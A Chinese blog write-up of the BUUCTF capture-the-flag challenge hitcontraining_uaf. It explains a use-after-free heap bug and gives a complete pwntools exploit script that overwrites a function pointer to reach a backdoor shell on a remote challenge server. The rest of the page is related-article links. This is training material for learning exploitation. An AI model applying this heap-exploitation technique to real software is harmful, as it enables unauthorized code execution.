[BUUCTF-pwn]——hitcontraining_uaf

最新推荐文章于 2023-06-17 16:48:04 发布
最新推荐文章于 2023-06-17 16:48:04 发布
阅读量323 收藏 2
点赞数 2
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114632346
版权

[BUUCTF-pwn]——hitcontraining_uaf

还是先checksec一下
在这里插入图片描述

在IDA中,三个比较关键的函数
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

我们可以发现add会申请两次内存,第一次申请8个字节,前四个字节指向print_note_content这个函数, 后四个字节指向我们写入的字符串(count会加1)

delete则会将刚才申请的两块空间给删除(count不会减一), 但是并不会指向NULL

printf函数会调用add申请的第一个8个字节中的前四个字节指向的函数

思路

首先我们可以先add两次第一个我们称为a, 第二个称为b, 注意内容的大小一定要超过8, 这里我们取40,分别为A, B

然后delete掉a(free A, a), 再delete b(free B, b), 这个时候如果我们再次add一个c,并且内容大小设为8

那么第一个8个字节c其实就是b, 就是我们第二个8个字节C其实就是a
这个时候我们写进去的东西就会覆盖原有的, 但是原先的指针仍然指向它.
我们就可以可以将print_note_content函数, 改为我们想要执行的函数了

(这个因为比较小输入fast bin范畴, 所以是先进后出.)

from pwn import*

p=remote('node3.buuoj.cn',26828)
#p = process('./hacknote')
#gdb.attach(p)
def add(size,content):
  p.sendlineafter('choice :','1')
  p.sendlineafter('Note size :',str(size))
  p.sendlineafter('Content :',content)

def delete(index):
  p.sendlineafter('choice :','2')
  p.sendlineafter('Index :',str(index))

def printf(index):
  p.sendlineafter('choice :','3')
  p.sendlineafter('Index :',str(index))

shell_addr=0x8048945

add(40,'aaaa')
add(40,'bbbb')
delete(1)
delete(0)
add(8,p32(shell_addr))
printf(1)

#第二种思路大家也可以看一下
#add(8,'aaaa')
#delete(0)
#delete(0)
#add(40,'aaaa')
#add(8,p32(shell_addr))
#printf(1)

p.interactive()
Y-peak
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1650
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
buuctf hitcontraining_uaf
cainiao78777的博客
04-12 236
会把指针堆块1重新分配给我们,context堆块会把指针堆块0分配给我们(因为我们申请一个堆块实际上是申请两个堆块(一个指针堆块,一个context堆块))程序是先申请一个指针堆块,这个指针堆块的大小为8字节,前四字节存储的是puts函数的指针,后四字节存储的是要申请的堆块内容指针就是相当于这样。3.打印堆块内容,这段代码会把指针堆块的第一个指针来执行函数,如果把第一个指针修改为后门函数指针,就能getshell。2.释放堆块,这个操作,在释放堆块之后,并未把指针置零,所以存在uaf漏洞。
hitcontraining_uaf
m0_62326489的博客
07-11 258
题目的一点自己理解
[BUUCTF]PWN——hitcontraining_unlink
mcmuyanga的博客
01-25 1000
hitcontraining_unlink 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况,经典堆题的菜单 64位ida打开,发现了读出flag的函数?根据buu上的习性,不懂这个路径对不对 main() show() add() edit() delete() 由于存在堆溢出和这个读出flag的函数,我们可以修改fd和bk的值,尝试使用fastbin attack。 #coding:utf-8 from pwn import * conte
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 311
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜单;
hitcontraining_magicheap-unlink
个人笔记
06-17 183
heaparray全局指针=0x6020C0;
hitcontrainingUAF之我见
TedLau的博客
06-16 272
hictontrainingUAF,太菜学了几天才懂这里的门道。我觉得我理解了这个题...继续学吧!
hitcontraining_uaf[use after free]
、moddemod
07-02 283
比较简单,直接留了后门! exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add_note(size, context): p.sendlineafter('choice :', str(1)) p.sendlineafter('size :', str(size)) p.sendafter('Con.
pwnable.kr-uaf WP
Casuall的博客
06-22 504
UAF(Use After Free)释放后重用,其实是一种指针未置空造成的漏洞。 首先介绍一下迷途指针的概念 在计算机编程领域中,迷途指针,或称悬空指针、野指针,指的是不指向任何合法的对象的指针。 当所指向的对象被释放或者收回,但是对该指针没有作任何的修改,以至于该指针仍旧指向已经回收的内存地址,此情况下该指针便称迷途指针。若操作系统将这部分已经释放的内存重新分配给另外一个进程,而原来的程序重...
Linux 二进制漏洞挖掘入门系列之(五)UAF 漏洞分析与利用
个人笔记
03-05 2269
UAF 0x10 UAF(Use After Free) 漏洞原理 这里,需要先介绍一下堆分配内存的原则。ptmalloc 是 glibc 的堆管理器,前身是 dlmalloc,Linux 中进程分配内存的两种方式:brk 和 mmap。当程序使用 malloc 申请内存的时候,如果小于 128K,使用 brk 方式,将数据段(.data)的最高地址指针_edata往高地址推;如果大于 128K...
UAF原理及相关一道CTF
qq_36963214的博客
07-27 2662
前言 通过学习UAF原理及其在CTF中的应用,通过理论是实践相结合,可以更好地掌握UAF漏洞。 UAF漏洞原理 #include<stdio.h> #include<stdlib.h> int main() { char *p1, *p2; p1 = p2 = NULL; p1 = (char *)malloc(10); if (p1 == NULL) { printf("fail to malloc p1"); exit(1); } memcpy(p1, "
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值